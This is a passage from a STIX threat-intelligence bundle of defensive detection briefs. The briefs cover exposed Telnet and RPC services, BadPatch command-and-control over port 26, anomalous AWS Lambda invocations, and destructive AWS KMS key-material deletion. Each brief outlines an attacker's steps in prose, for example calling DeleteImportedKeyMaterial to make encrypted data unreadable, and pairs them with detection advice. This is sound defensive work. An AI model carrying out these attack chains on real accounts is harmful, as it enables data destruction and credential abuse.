generated by the \"Accepted Default Telnet Port Connection\" rule, prioritizing external connections or those involving critical assets, referring to the `falsepositives` for tuning.\n*   Implement strict network segmentation to limit Telnet access to only authorized internal subnets and prevent any exposure to the internet.\n",
      "published": "2026-07-03T16:03:28Z",
      "labels": [
        "command-and-control",
        "lateral-movement",
        "initial-access",
        "telnet",
        "network-security",
        "detection",
        "elastic-rule"
      ],
      "object_refs": [
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a",
        "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/network/command_and_control_accepted_default_telnet_port_connection.toml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--46ca25fc-95c5-5a3a-9f2b-c046aa1fd89a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b2370789-4581-5629-9bdd-cb3258c60efa",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1021",
          "url": "https://attack.mitre.org/techniques/T1021"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7e35443e-0739-57c7-a9ff-03d22fba7475",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b2370789-4581-5629-9bdd-cb3258c60efa",
      "target_ref": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b2370789-4581-5629-9bdd-cb3258c60efa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "RPC (Remote Procedure Call) Services Exposed to the Internet",
      "description": "## Overview\n\nThis threat brief addresses the critical security risk posed by Remote Procedure Call (RPC) services being directly exposed to the Internet. While RPC is a legitimate and common protocol for remote management and resource sharing within internal networks, its direct exposure to external networks is a significant misconfiguration frequently targeted and exploited by threat actors. Attackers leverage this exposure as an initial access vector or to establish persistent backdoors, enabling unauthorized access, lateral movement, and ultimately, network compromise. The provided intelligence highlights that such traffic is a strong indicator of potential exploitation attempts by monitoring specific ports (like TCP/135) and internal-to-external IP ranges. Identifying and mitigating this exposure is crucial for preventing severe security incidents.\n\n## Attack Chain\n\nThis brief focuses on detecting a critical security misconfiguration: the exposure of Remote Procedure Call (RPC) services directly to the Internet. The provided intelligence describes RPC to the Internet as a frequently targeted and exploited vector for initial access and backdoor establishment, rather than detailing a specific multi-stage attack campaign. If exploited, the typical sequence of events would involve:\n\n1.  **Internet Scanning**: Threat actors actively scan public IP ranges to identify hosts with exposed RPC services, often targeting TCP port 135 (DCE/RPC Endpoint Mapper).\n2.  **Vulnerability Identification**: Once an exposed RPC service is found, attackers attempt to identify specific vulnerabilities or misconfigurations that can be leveraged for unauthorized access or remote code execution.\n3.  **Initial Access**: Exploitation of the identified RPC vulnerability grants the attacker initial access to the target system, often achieving privileged execution or a remote shell.\n4.  **Backdoor Establishment**: To maintain persistent control, the attacker deploys a backdoor or modifies system configurations to ensure continued access to the compromised machine.\n5.  **Internal Reconnaissance**: From the initially compromised host, the attacker performs internal network reconnaissance to map the environment, identify other systems, and search for valuable assets.\n6.  **Lateral Movement**: The attacker then attempts to move laterally within the network, potentially exploiting other internal RPC services (like DCOM over SMB) or other vulnerabilities to expand their control and reach their ultimate objectives.\n7.  **Objective Achievement**: The final stage involves achieving the attacker's goal, which could range from data exfiltration, deployment of ransomware, or maintaining long-term espionage capabilities.\n\n## Impact\n\nThe direct exposure of RPC services to the Internet creates a severe vulnerability that, if exploited, can lead to significant organizational damage. Successful exploitation commonly results in unauthorized access to internal systems, allowing threat actors to gain a foothold within the network. This initial breach can rapidly escalate to broader network compromise, data exfiltration, the deployment of ransomware, or the establishment of long-term espionage capabilities. Without detection and remediation, affected organizations face potential data loss, operational disruption, financial costs from recovery, and reputational damage. The lack of proper segmentation for RPC traffic to the Internet essentially creates an open door for adversaries.\n\n## Recommendation\n\n*   Deploy the Sigma rule provided in this brief to your SIEM/detection platform to detect outbound RPC traffic from internal networks to the Internet.\n*   Investigate all alerts generated by the `RPC (Remote Procedure Call) to the Internet` rule to determine the legitimacy and intent of the communication.\n*   Review the source IP addresses involved in detected RPC traffic and check for any recent changes or anomalies on those systems.\n*   Implement strict network segmentation and firewall rules to prevent RPC traffic (specifically TCP/135 and DCE/RPC) from originating from internal networks and reaching the Internet.\n*   Apply necessary patches and updates to all systems that may be exposing RPC services, addressing any known vulnerabilities.\n*   Conduct regular vulnerability assessments and penetration tests to identify and remediate internet-facing RPC exposures.\n",
      "published": "2026-07-03T16:01:52Z",
      "labels": [
        "network-traffic",
        "initial-access",
        "lateral-movement",
        "vulnerability",
        "misconfiguration",
        "network"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml"
        },
        {
          "source_name": "reference",
          "url": "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--72f7bd85-9ee1-5df5-a42b-0037846895ce",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5e8fe700-c47f-5137-8e9c-912005ce5157",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3648fae3-5597-5cb8-bf1c-2340b67e3cef",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Non-Standard Port",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1571",
          "url": "https://attack.mitre.org/techniques/T1571"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--935cb6dc-bba1-598a-8907-e2542edc0f35",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5e8fe700-c47f-5137-8e9c-912005ce5157",
      "target_ref": "attack-pattern--3648fae3-5597-5cb8-bf1c-2340b67e3cef"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Alternative Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1048",
          "url": "https://attack.mitre.org/techniques/T1048"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--02f0940a-0170-585b-bce5-62dea45d7f5b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5e8fe700-c47f-5137-8e9c-912005ce5157",
      "target_ref": "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5e8fe700-c47f-5137-8e9c-912005ce5157",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "BadPatch Malware Using SMTP on Port 26 for Command and Control",
      "description": "## Overview\n\nThe BadPatch malware family has been observed employing a stealthy command and control (C2) mechanism by communicating over SMTP on TCP port 26. While port 25 is the standard for SMTP, port 26 is sometimes used by legitimate mail transfer agents to avoid conflicts or bypass network restrictions. Adversaries, including BadPatch, exploit this non-standard port to evade detection, making their C2 traffic less conspicuous. This technique allows BadPatch to establish covert communication channels with infected Windows systems, facilitating unauthorized control, data exfiltration, and further malicious activities. Detection engineers should be aware that while some legitimate email services might use port 26, its use by endpoint systems for outbound SMTP is highly suspicious and indicative of potential compromise.\n\n## Impact\n\nIf the BadPatch malware successfully establishes command and control via SMTP on port 26, compromised Windows systems can be subjected to unauthorized remote access and control. This allows attackers to execute commands, exfiltrate sensitive data, download additional malicious payloads, and further propagate within the network. The covert nature of this C2 channel makes it challenging to detect without specific monitoring, increasing the dwell time for attackers and potentially leading to significant data breaches, system disruption, and financial losses for targeted organizations.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Detect SMTP on Port 26/TCP\" provided in this brief to your SIEM/detection platform and tune it for your environment.\n*   Investigate all alerts generated by the \"Detect SMTP on Port 26/TCP\" rule, correlating with endpoint and network logs to identify the source process and destination.\n*   Review the network traffic logs from sources like Zeek or Corelight to identify any unusual patterns or anomalies associated with TCP port 26, focusing on any identified SMTP-like traffic.\n*   Implement firewall rules to restrict outbound connections on TCP port 26 from internal workstations, allowing exceptions only for known, legitimate mail servers if applicable.\n*   Correlate observed network connections to destination port 26 with threat intelligence sources mentioned in the references to identify known malicious indicators.\n",
      "published": "2026-07-03T16:00:17Z",
      "labels": [
        "command-and-control",
        "exfiltration",
        "network",
        "windows",
        "malware"
      ],
      "object_refs": [
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--3648fae3-5597-5cb8-bf1c-2340b67e3cef",
        "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://unit42.paloaltonetworks.com/unit42-badpatch/"
        },
        {
          "source_name": "reference",
          "url": "https://isc.sans.edu/forums/diary/Next+up+whats+up+with+TCP+port+26/25564/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/network/command_and_control_port_26_activity.toml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--190e5fdc-bb5f-567d-953a-208cee17d0b1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Serverless Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1648",
          "url": "https://attack.mitre.org/techniques/T1648"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--be1da9b1-a2cf-5b1f-9229-a5c70f828421",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d900030f-0014-5db1-8944-3d2b6e747eae",
      "target_ref": "attack-pattern--190e5fdc-bb5f-567d-953a-208cee17d0b1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d900030f-0014-5db1-8944-3d2b6e747eae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AWS Lambda Function Invoked by Unusual Principal",
      "description": "## Overview\n\nThis brief addresses a detection mechanism designed to identify suspicious activity within Amazon Web Services (AWS) environments, specifically targeting the AWS Lambda service. Adversaries who successfully compromise credentials or achieve lateral movement within an AWS account may attempt to directly invoke Lambda functions to execute their code, retrieve sensitive data, or exploit over-permissioned execution roles. This detection focuses on such direct invocations made by a principal (user, role, or assumed role) that deviates from typical event-driven patterns and represents the first such action by that specific principal within the last 14 days. This behavior often signals credential abuse or unauthorized access and is a critical indicator for defenders to review. Effective detection requires enabling AWS Lambda data event logging in CloudTrail, which is not configured by default.\n\n## Attack Chain\n\n1.  **Initial Access**: An adversary obtains legitimate AWS credentials, often through methods such as phishing, exploiting vulnerable web applications to discover API keys, or compromising an endpoint with AWS CLI configurations.\n2.  **Lateral Movement**: The adversary uses the initially compromised credentials to pivot within the AWS environment, assuming roles or gaining access to other credentials that possess `lambda:InvokeFunction` permissions for target Lambda functions.\n3.  **Credential Usage**: The adversary utilizes these newly acquired or validated credentials to interact directly with AWS services, bypassing typical event-driven automation for Lambda functions.\n4.  **Execution via Lambda**: The adversary directly invokes an AWS Lambda function using tools like the AWS CLI, SDK, or management console, an action recorded as an `Invoke` API call in CloudTrail. This specific invocation marks the first time this particular principal has directly called a Lambda function in the account within a rolling 14-day window.\n5.  **Malicious Payload Execution**: The invoked Lambda function, under adversary control or via its compromised execution context, executes malicious code, performs reconnaissance, or triggers unintended actions within the serverless environment.\n6.  **Objective Achievement**: The adversary uses the Lambda function's capabilities to exfiltrate sensitive data, establish persistence, further elevate privileges, or perform other actions to achieve their ultimate objective.\n\n## Impact\n\nThe successful exploitation of Lambda function invocation can lead to severe consequences, including unauthorized code execution, sensitive data exfiltration, and privilege escalation within the AWS environment. Depending on the Lambda function's permissions and access, adversaries could gain control over other AWS resources, modify infrastructure, or compromise critical applications and databases. This type of compromise can result in significant financial losses, reputational damage, and regulatory non-compliance, particularly if the functions handle personal identifiable information (PII) or other regulated data.\n\n## Recommendation\n\n*   Enable AWS Lambda data event logging in CloudTrail for all relevant functions, especially those handling sensitive data or possessing broad permissions, as this is required to detect the activity described in the rule.\n*   Deploy the provided Sigma rule to your SIEM and tune it to identify direct Lambda invocations that deviate from known legitimate operational or testing activities.\n*   When an alert triggers, review the `aws.cloudtrail.user_identity.arn`, `source.ip`, and `user_agent.original` fields to identify the invoking principal and source of the activity.\n*   Inspect `aws.cloudtrail.request_parameters` to determine the specific `functionName` that was invoked and assess its criticality and owner.\n*   If unauthorized activity is confirmed, promptly rotate or restrict the credentials associated with the `aws.cloudtrail.user_identity.arn` that triggered the alert.\n*   Constrain `lambda:InvokeFunction` permissions to only the identities and services that explicitly require them, following the principle of least privilege.\n",
      "published": "2026-07-03T15:59:25Z",
      "labels": [
        "cloud",
        "aws",
        "lambda",
        "execution",
        "lateral-movement"
      ],
      "object_refs": [
        "attack-pattern--190e5fdc-bb5f-567d-953a-208cee17d0b1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/execution_lambda_function_invoked_by_unusual_principal.toml"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/lambda/latest/api/API_Invoke.html"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/lambda/latest/dg/logging-using-cloudtrail.html"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--190e5fdc-bb5f-567d-953a-208cee17d0b1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Serverless Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1648",
          "url": "https://attack.mitre.org/techniques/T1648"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e63a9176-7488-50b1-a30b-9a1f9bda14c7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d468da73-900a-51bc-bfc5-53da40c17bc6",
      "target_ref": "attack-pattern--190e5fdc-bb5f-567d-953a-208cee17d0b1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d468da73-900a-51bc-bfc5-53da40c17bc6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AWS Lambda Function Invoked from Unusual Source ASN",
      "description": "## Overview\n\nOrganizations are facing a persistent threat where malicious actors compromise AWS credentials, specifically execution-role or user credentials, to gain unauthorized access and execute functions within a victim's AWS environment. This activity is detected when an AWS Lambda function is directly invoked by a principal from an Autonomous System Number (ASN) that has not been observed for that principal within the last 10 days, excluding well-known cloud provider networks like Amazon, Google, or Microsoft. Such \"out-of-pattern\" invocations are a strong indicator that stolen credentials have been replayed from attacker-controlled infrastructure. The underlying credential theft might stem from various sources, including Server-Side Request Forgery (SSRF) or Remote Code Execution (RCE) vulnerabilities exploited within existing functions or other AWS resources, or simply leaked access keys. Successful exploitation can lead to data exfiltration, resource manipulation, or further lateral movement within the compromised AWS account.\n\n## Attack Chain\n\n1.  **Initial Access**: Attacker gains an initial foothold within the victim's environment, potentially via phishing campaigns targeting AWS users, exploitation of a public-facing application vulnerability (e.g., SSRF or RCE on an EC2 instance), or discovery of exposed AWS access keys.\n2.  **Credential Theft**: Within the compromised environment, the attacker discovers and steals valid AWS credentials, which could include IAM user access keys, temporary session tokens, or execution role credentials associated with a compromised instance or service.\n3.  **Lateral Movement to Attacker Infrastructure**: The attacker then transfers these stolen AWS credentials to their own command-and-control (C2) infrastructure, typically a VPS or server operating outside of the victim's legitimate network space.\n4.  **Malicious Lambda Invocation**: From their controlled infrastructure, the attacker uses the stolen credentials to directly invoke an AWS Lambda function within the victim's account. This invocation originates from a source IP address and its corresponding ASN that is unusual and not historically associated with the legitimate principal.\n5.  **Execution of Malicious Logic**: The invoked AWS Lambda function executes, leveraging its assigned permissions to perform unauthorized actions such as accessing sensitive data, modifying AWS resources, or triggering other services.\n6.  **Data Exfiltration or Persistence**: The attacker uses the Lambda function's capabilities to exfiltrate sensitive data from the AWS environment or to establish additional persistence mechanisms for future access.\n\n## Impact\n\nThe primary impact of such credential abuse and unauthorized Lambda invocation is the potential for significant data exfiltration, leading to regulatory penalties, reputational damage, and loss of competitive advantage. Attackers can also use the compromised Lambda function to manipulate cloud resources, escalate privileges, or deploy further malicious payloads, resulting in widespread disruption of services, increased operational costs, and a broader compromise of the AWS account. The compromise of a critical function could also lead to denial of service or integrity violations of applications.\n\n## Recommendation\n\n*   Enable AWS Lambda data event logging for all critical Lambda functions within CloudTrail, as this rule relies on these logs for detection.\n*   Deploy the provided Sigma rule to your SIEM and tune it by adding legitimate, new source ASNs or user identities to an exclusion list after validation to reduce false positives.\n*   Review `source.ip`, `source.as.organization.name`, `source.geo`, and `aws.cloudtrail.user_identity.arn` fields from reported alerts to verify legitimate operational activity.\n*   Rotate or revoke any AWS credentials (`aws.cloudtrail.user_identity.access_key_id`) confirmed to be abused and review the access history of the invoked function.\n*   Implement IAM conditions to constrain `lambda:InvokeFunction` permissions to expected identities and known networks where feasible.\n",
      "published": "2026-07-03T15:58:16Z",
      "labels": [
        "aws",
        "cloud",
        "credential-theft",
        "execution",
        "lambda"
      ],
      "object_refs": [
        "attack-pattern--190e5fdc-bb5f-567d-953a-208cee17d0b1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/lambda/latest/api/API_Invoke.html"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/lambda/latest/dg/logging-using-cloudtrail.html"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Destruction",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1485",
          "url": "https://attack.mitre.org/techniques/T1485"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--091f87c5-bc70-5d17-ae1e-da412b63a01d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--df959f47-1eb7-5888-b355-39c231675a7a",
      "target_ref": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--df959f47-1eb7-5888-b355-39c231675a7a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AWS KMS Imported Key Material Deleted",
      "description": "## Overview\n\nThis brief details a critical technique used by adversaries to achieve immediate and irreversible data destruction or to facilitate cloud ransomware within AWS environments. Adversaries exploit the `DeleteImportedKeyMaterial` API call against AWS Key Management Service (KMS) customer managed keys (CMKs) that use external key material (Bring Your Own Key - BYOK). Unlike standard key deletion processes which include a mandatory pending period, this action instantly renders the affected key unusable. Consequently, all data previously encrypted with this CMK becomes immediately inaccessible, with no built-in recovery window, presenting a significant threat to data availability and integrity. This technique is particularly dangerous due to its instant effect and potential for unrecoverable data loss if the original key material is not securely retained or an attacker withholds it.\n\n## Attack Chain\n\n1.  **Initial Compromise**: An adversary gains unauthorized access to an AWS account, often through compromised credentials, exposed API keys, or exploitation of a vulnerable service.\n2.  **Reconnaissance \u0026 Privilege Escalation**: The adversary identifies AWS KMS keys with imported key material (BYOK) and elevates privileges to perform KMS actions, specifically `kms:DeleteImportedKeyMaterial`.\n3.  **Key Identification**: The adversary identifies critical CMKs protecting sensitive data or essential services that are reliant on imported key material.\n4.  **Material Deletion**: The adversary executes the `kms:DeleteImportedKeyMaterial` API call against targeted BYOK CMKs.\n5.  **Data Inaccessibility**: The deletion immediately revokes access to the cryptographic key material, rendering all data encrypted by these CMKs instantly inaccessible.\n6.  **Impact/Extortion**: The adversary either performs data destruction for sabotage purposes or demands a ransom for the re-importation of key material (if the attacker controls the material or a copy).\n\n## Impact\n\nSuccessful execution of the `DeleteImportedKeyMaterial` action results in immediate and potentially unrecoverable data loss across all services and data encrypted by the targeted AWS KMS customer managed key. This impact is instant, bypassing the standard grace period associated with `ScheduleKeyDeletion`. Organizations can face severe operational disruption, financial losses due to data inaccessibility, and potentially irrecoverable data if the original key material is not securely backed up or if the attacker withholds it during a ransomware scenario. The technique is used for both pure data destruction (sabotage) and cloud-specific ransomware campaigns, targeting the foundational security mechanism of cloud data protection.\n\n## Recommendation\n\n*   Enable AWS CloudTrail management events for KMS actions and ensure ingestion into your SIEM to collect relevant `aws.cloudtrail` logs.\n*   Deploy the Sigma rule \"AWS KMS Imported Key Material Deleted\" in this brief to detect `kms:DeleteImportedKeyMaterial` calls.\n*   Investigate alerts by examining `aws.cloudtrail.user_identity.arn`, `aws.cloudtrail.user_identity.access_key_id`, `aws.cloudtrail.user_identity.type`, `source.ip`, and `user_agent.original` fields in the generated `aws.cloudtrail` logs for unexpected activity.\n*   Restrict `kms:DeleteImportedKeyMaterial` and `kms:ImportKeyMaterial` permissions to a minimal set of trusted administrative roles using IAM policies and AWS Organizations Service Control Policies (SCPs).\n*   Maintain secure, offline backups of all imported key material (BYOK) to ensure recoverability in case of unauthorized deletion.\n",
      "published": "2026-07-03T15:57:06Z",
      "labels": [
        "cloud",
        "aws",
        "kms",
        "data-destruction",
        "ransomware"
      ],
      "object_refs": [
        "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/kms/latest/APIReference/API_DeleteImportedKeyMaterial.html"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/kms/latest/developerguide/importing-keys.html"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--190e5fdc-bb5f-567d-953a-208cee17d0b1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Serverless Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1648",
          "url": "https://attack.mitre.org/techniques/T1648"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fbe77428-bffc-538c-b040-c208e7c4b914",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bd0f9cf6-5512-5e29-a06c-f35af5251c31",
      "target_ref": "attack-pattern--190e5fdc-bb5f-567d-953a-208cee17d0b1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--bd0f9cf6-5512-5e29-a06c-f35af5251c31",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AWS Lambda Function Invoked Cross-Account",
      "description": "## Overview\n\nThis brief details a detection for cross-account AWS Lambda function invocations. Adversaries may leverage previously granted invoke permissions on a Lambda function, or operate from a separate attacker-controlled AWS account, to execute functions in a victim's environment. This activity, often a data-plane realization of an earlier cross-account resource-policy grant, allows an attacker to execute arbitrary code or retrieve sensitive data controlled by the function. The detection relies on capturing AWS Lambda data events through CloudTrail, which is not enabled by default, and identifying discrepancies between the invoking principal's account ARN (`aws.cloudtrail.user_identity.arn`) and the invoked function's owning account ARN (`aws.cloudtrail.request_parameters`). This behavior, while potentially legitimate in multi-account architectures, warrants investigation when observed.\n\n## Attack Chain\n\n1. An adversary gains control over an AWS account or secures `lambda:InvokeFunction` permissions for a target Lambda function in a different AWS account.\n2. The adversary initiates an `Invoke` API call to the target Lambda function from their external or controlled AWS account.\n3. The AWS Lambda service processes the cross-account invocation request, authenticating the invoking principal.\n4. The invoked Lambda function executes, performing its defined operations within the victim's AWS environment.\n5. AWS CloudTrail logs the successful `Invoke` data event, including the ARN of the invoking principal and the ARN of the function.\n6. The adversary potentially receives the function's output, allowing for data retrieval, or benefits from actions performed by the function, such as resource manipulation or further compromise.\n\n## Impact\n\nIf an unauthorized cross-account Lambda invocation succeeds, adversaries can execute arbitrary code within the context of the Lambda function's permissions, potentially leading to privilege escalation, data exfiltration from resources accessible by the function, or unauthorized modification of the victim's AWS environment. This can result in significant data breaches, service disruption, or complete compromise of the affected AWS account. While this activity can be legitimate in multi-account environments, unauthorized instances represent a critical security breach impacting data confidentiality, integrity, and availability.\n\n## Recommendation\n\n* Enable AWS Lambda data event logging in CloudTrail, as described in the `setup` section of the source rule, to ensure the necessary telemetry is captured for this detection.\n* Implement the detection logic outlined in the provided Elastic rule within your SIEM to identify cross-account Lambda function invocations.\n* When an alert triggers, review the `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.request_parameters` fields to determine the caller and function accounts, validating against known, trusted cross-account access.\n* Investigate recent activity from the `Esql.caller_account` and `Esql.source_ips` identified by the detection for other suspicious cross-account actions.\n* If an unauthorized cross-account invocation is confirmed, promptly remove the `lambda:InvokeFunction` permissions using `RemovePermission` and review what the function accessed or returned, as suggested in the `response and remediation` section of the source.\n",
      "published": "2026-07-03T15:55:55Z",
      "labels": [
        "cloud",
        "aws",
        "aws-lambda",
        "execution",
        "cloud-security"
      ],
      "object_refs": [
        "attack-pattern--190e5fdc-bb5f-567d-953a-208cee17d0b1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/execution_lambda_function_invoked_cross_account.toml"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/lambda/latest/dg/access-control-resource-based.html"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/lambda/latest/dg/logging-using-cloudtrail.html"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Inhibit System Recovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1490",
          "url": "https://attack.mitre.org/techniques/T1490"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5206d466-ece8-5dbf-a436-e69a2a9124d7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bce1b856-2709-52f4-a553-8b9bce101b8d",
      "target_ref": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--bce1b856-2709-52f4-a553-8b9bce101b8d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AWS Backup Recovery Point Deletion as Anti-Recovery Tactic",
